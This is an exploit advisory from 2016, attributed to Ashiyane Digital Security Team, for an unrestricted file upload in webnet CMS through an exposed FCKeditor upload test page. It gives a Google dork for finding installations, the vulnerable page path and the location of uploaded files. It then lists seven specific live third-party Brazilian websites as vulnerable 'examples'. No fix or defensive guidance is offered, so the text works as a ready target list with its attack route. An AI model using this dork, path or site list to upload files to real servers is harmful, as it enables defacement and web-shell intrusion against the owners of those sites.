|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |=============================================================| |[+] Exploit Title: webnet CMS - File Upload |[+] |[+] Exploit Author: Ashiyane Digital Security Team |[+] |[+] Vendor Homepage: http://www.webnet.inf.br/ |[+] |[+] Google Dork: intext:"Desenvolvido por Webnet Soluções Tecnológicas." |[+] |[+] Tested on: Kali Linux |[+] |[+] Date: Wed, 19 October 2016 |[+] |=============================================================| | PoC of File Upload (FCKeditor): | Vulnerable page : http://localhost/fckeditor/editor/filemanager/connectors/uploadtest.html | Path of file : http://localhost/gerenciador/public_html/file.txt |=============================================================| |[+] Examples : |[+] |[+] http://www.carrodeboiudi.com.br/fckeditor/editor/filemanager/connectors/uploadtest.html |[+] |[+] http://saldaterra.org.br/fckeditor/editor/filemanager/connectors/uploadtest.html |[+] |[+] http://www.apauberlandia.org.br/fckeditor/editor/filemanager/connectors/uploadtest.html |[+] |[+] http://www.cozix.com.br/fckeditor/editor/filemanager/connectors/uploadtest.html |[+] |[+] http://www.razzao.com.br/fckeditor/editor/filemanager/connectors/uploadtest.html |[+] |[+] http://www.ortomoreira.com.br/fckeditor/editor/filemanager/connectors/uploadtest.html |[+] |[+] http://lgsolucoes.net.br/fckeditor/editor/filemanager/connectors/uploadtest.html |[+] |=============================================================| |[+] Discovered By : M.R.S.L.Y |=============================================================|